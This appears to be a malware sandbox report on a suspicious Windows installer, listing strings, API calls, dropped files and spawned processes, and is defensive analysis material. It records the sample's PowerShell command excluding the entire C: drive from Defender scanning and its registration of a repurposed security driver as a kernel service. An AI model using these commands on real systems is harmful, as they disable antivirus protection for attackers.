The PDB path identifies the dropped tProtect.dll, the file the `sc create CleverSoar ... type= kernel` command above registers as a kernel-mode service, as an x64 release build of TfSysMon, the system-monitor driver shipped with PC Tools ThreatFire ("threat~1" is the 8.3 short name of that product directory; objfre_wnet_amd64 is the old WDK build-environment name for a free build targeting Windows Server 2003 x64). A .dll extension on a kernel service binary is itself worth flagging in triage: sc.exe accepts any path, but legitimately installed drivers are almost always .sys files.
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, Code function: 12_2_6C9698B0 FindFirstFileA,FindClose,FindClose,12_2_6C9698B0
Source: C:\Program Files (x86)\Windows NT\7zr.exe, Code function: 17_2_009B6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,17_2_009B6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe, Code function: 17_2_009B7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,17_2_009B7496
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: time.windows.com
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.dr, String found in binary or memory (DigiCert chain, CRL and OCSP URLs from embedded code-signing certificates; the trailing characters are adjacent DER bytes, not part of the URL):
  http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
  http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
  http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
  http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
  http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
  http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
  http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
  http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
  http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
  http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
  http://ocsp.digicert.com0A
  http://ocsp.digicert.com0C
  http://ocsp.digicert.com0H
  http://ocsp.digicert.com0I
  http://ocsp.digicert.com0X
  http://www.digicert.com/CPS0
  http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.dr, String found in binary or memory (usage text consistent with a bundled aria2 downloader):
  http://www.metalinker.org/
  http://www.metalinker.org/basic_string::_M_construct
  https://aria2.github.io/
  https://aria2.github.io/Usage:
Source: svchost.exe (process index 00000000, the first svchost.exe in the tree; Windows Maps service endpoints, unrelated to the sample), String found in binary or memory:
  http://www.bingmapsportal.com (00000000.00000002.1375414809.0000023699613000.00000004.00000020.00020000.00000000.sdmp)
  https://appexmapsappupdate.blob.core.windows.net (00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmp)
  https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/ (00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmp)
  https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ (00000000.00000003.1373700171.0000023699662000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1373850880.000002369965F000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.1375834176.0000023699681000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.1375773862.0000023699663000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1374084418.000002369965A000.00000004.00000020.00020000.00000000.sdmp)
  https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ (00000000.00000002.1375834176.0000023699681000.00000004.00000020.00020000.00000000.sdmp)
  https://dev.ditu.live.com/REST/v1/Locations (00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmp)
  https://dev.ditu.live.com/REST/v1/Routes/ (00000000.00000003.1373656171.0000023699667000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.1375809019.0000023699668000.00000004.00000020.00020000.00000000.sdmp)
  https://dev.ditu.live.com/REST/v1/Transit/Stops/ (00000000.00000002.1375834176.0000023699681000.00000004.00000020.00020000.00000000.sdmp)
  https://dev.ditu.live.com/mapcontrol/logging.ashx (00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmp)
  https://dev.virtualearth.net/REST/v1/Imagery/Copyright/ (00000000.00000003.1373700171.0000023699662000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.1375773862.0000023699663000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1374084418.000002369965A000.00000004.00000020.00020000.00000000.sdmp)
  https://dev.virtualearth.net/REST/v1/Locations (00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmp)
  https://dev.virtualearth.net/REST/v1/Routes/ (00000000.00000003.1373656171.0000023699667000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.1375809019.0000023699668000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.1375467866.000002369962B000.00000004.00000020.00020000.00000000.sdmp)
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000000.00000002.1375547449.000002369963F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1373700171.0000023699662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1375773862.0000023699663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000000.00000002.1375570309.0000023699642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374133902.0000023699641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000000.00000003.1373700171.0000023699662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1375773862.0000023699663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000000.00000003.1374107566.0000023699649000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1373700171.0000023699662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374188871.0000023699630000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1375773862.0000023699663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000000.00000003.1374133902.0000023699641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000002.1375773862.0000023699663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000000.00000002.1375570309.0000023699642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1373850880.000002369965F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374133902.0000023699641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000003.1374133902.0000023699641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000000.00000003.1373656171.0000023699667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1375809019.0000023699668000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1375467866.000002369962B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drString found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drString found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: svchost.exe, 00000000.00000002.1375496859.0000023699634000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374188871.0000023699630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.til
Source: svchost.exe, 00000000.00000003.1374188871.0000023699630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtu
Source: svchost.exe, 00000000.00000003.1374133902.0000023699641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000000.00000003.1374188871.000002369963D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374133902.0000023699641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000000.00000003.1374188871.000002369963D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374133902.0000023699641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000002.1375467866.000002369962B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000003.1374188871.0000023699630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvsX:c
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000003.00000003.1281432231.000000007F71B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000003.00000003.1280532280.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000000.1283151510.0000000000511000.00000020.00000001.01000000.00000005.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000000.1355069130.00000000007CD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.11.dr, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.3.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000003.00000003.1281432231.000000007F71B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000003.00000003.1280532280.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000000.1283151510.0000000000511000.00000020.00000001.01000000.00000005.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000000.1355069130.00000000007CD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.11.dr, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.3.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process information set: 01 00 00 00

System Summary

Source: update.vac.6.dr | Static PE information: section name: .j)q
Source: update.vac.12.dr | Static PE information: section name: .j)q
Source: updat4.vac.12.dr | Static PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 12_2_6C973F30 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle | 12_2_6C973F30
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 12_2_6C7F3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread | 12_2_6C7F3886
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 12_2_6C7F3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread | 12_2_6C7F3C62
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 12_2_6C7F3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread | 12_2_6C7F3D62
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 12_2_6C7F3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread | 12_2_6C7F3D18
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 12_2_6C7F39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread | 12_2_6C7F39CF
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 12_2_6C7F3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread | 12_2_6C7F3A6A
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 12_2_6C974B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction | 12_2_6C974B80
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 12_2_6C7F1950: CreateFileA,DeviceIoControl,CloseHandle | 12_2_6C7F1950
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 12_2_6C7F4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor | 12_2_6C7F4754
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 009B1E40 appears 150 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00A4FB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 009B28E3 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: String function: 6CA44F10 appears 673 times
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: String function: 6C9A7240 appears 49 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.11.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.11.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.3.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000003.00000003.1281432231.000000007FA1A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000003.00000003.1280532280.000000000300E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000003.00000000.1278158552.0000000000A39000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: OriginalFileNameSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe | Binary or memory string: OriginalFileNameSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.19.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.19.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal92.evad.winEXE@125/32@1/0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 12_2_6C974B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction | 12_2_6C974B80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 17_2_009B9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle | 17_2_009B9313
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 17_2_009C3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError | 17_2_009C3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 17_2_009B9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW | 17_2_009B9252
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 12_2_6C974050 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW | 12_2_6C974050
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | File created: C:\Program Files (x86)\Windows NT\is-S1M3N.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | File created: C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.dr | Binary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.dr | Binary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.dr | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe | Virustotal: Detection: 9%
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Process created: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
